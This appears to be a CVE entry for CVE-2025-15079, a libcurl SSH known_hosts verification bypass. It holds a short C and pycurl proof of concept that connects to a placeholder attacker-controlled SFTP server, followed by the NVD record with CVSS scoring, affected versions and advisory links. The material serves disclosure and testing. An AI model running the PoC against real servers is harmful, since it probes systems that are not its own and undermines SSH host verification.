CVE-2025-15079

// CVE-2025-15079 PoC - libcurl SSH known_hosts bypass // This PoC demonstrates how libcurl accepts hosts not in user-specified known_hosts // if they are present in the libssh global known_hosts file #include <stdio.h> #include <curl/curl.h> int main(void) { CURL *curl; CURLcode res; // Initialize libcurl curl = curl_easy_init(); if(curl) { // Set user-specified known_hosts file (should only trust these hosts) curl_easy_setopt(curl, CURLOPT_SSH_KNOWNHOSTS, "/path/to/user_known_hosts"); // Target malicious/untrusted SSH server curl_easy_setopt(curl, CURLOPT_URL, "sftp://attacker-controlled-server/file.txt"); // Credentials curl_easy_setopt(curl, CURLOPT_USERPWD, "user:password"); // This connection will succeed even if attacker-server is NOT in user_known_hosts // because libcurl/libssh checks the GLOBAL known_hosts file res = curl_easy_perform(curl); if(res != CURLE_OK) { printf("Connection failed: %s\n", curl_easy_strerror(res)); } else { printf("VULNERABLE: Connection accepted despite host not in user_known_hosts!\n"); } curl_easy_cleanup(curl); } return 0; } // Python equivalent using pycurl """ import pycurl c = pycurl.Curl() c.setopt(pycurl.URL, "sftp://target-server/sensitive-file") c.setopt(pycurl.SSH_KNOWNHOSTS, "/path/to/user_known_hosts") c.setopt(pycurl.USERPWD, "username:password") # This will bypass user-specified known_hosts if host exists in global known_hosts c.perform() """

{"cve": {"id": "CVE-2025-15079", "sourceIdentifier": "2499f714-1537-4658-8207-48ae4bb9eae9", "published": "2026-01-08T10:15:47.100", "lastModified": "2026-01-20T14:50:24.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-297"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.58.0", "versionEndExcluding": "8.18.0", "matchCriteriaId": "7FEF1B43-51CF-47FA-8D6C-2411D9B3F9C1"}]}]}], "references": [{"url": "https://curl.se/docs/CVE-2025-15079.html", "source": "2499f714-1537-4658-8207-48ae4bb9eae9", "tags": ["Vendor Advisory", "Patch"]}, {"url": "https://curl.se/docs/CVE-2025-15079.json", "source": "2499f714-1537-4658-8207-48ae4bb9eae9", "tags": ["Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3477116", "source": "2499f714-1537-4658-8207-48ae4bb9eae9", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/07/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory", "Patch"]}]}}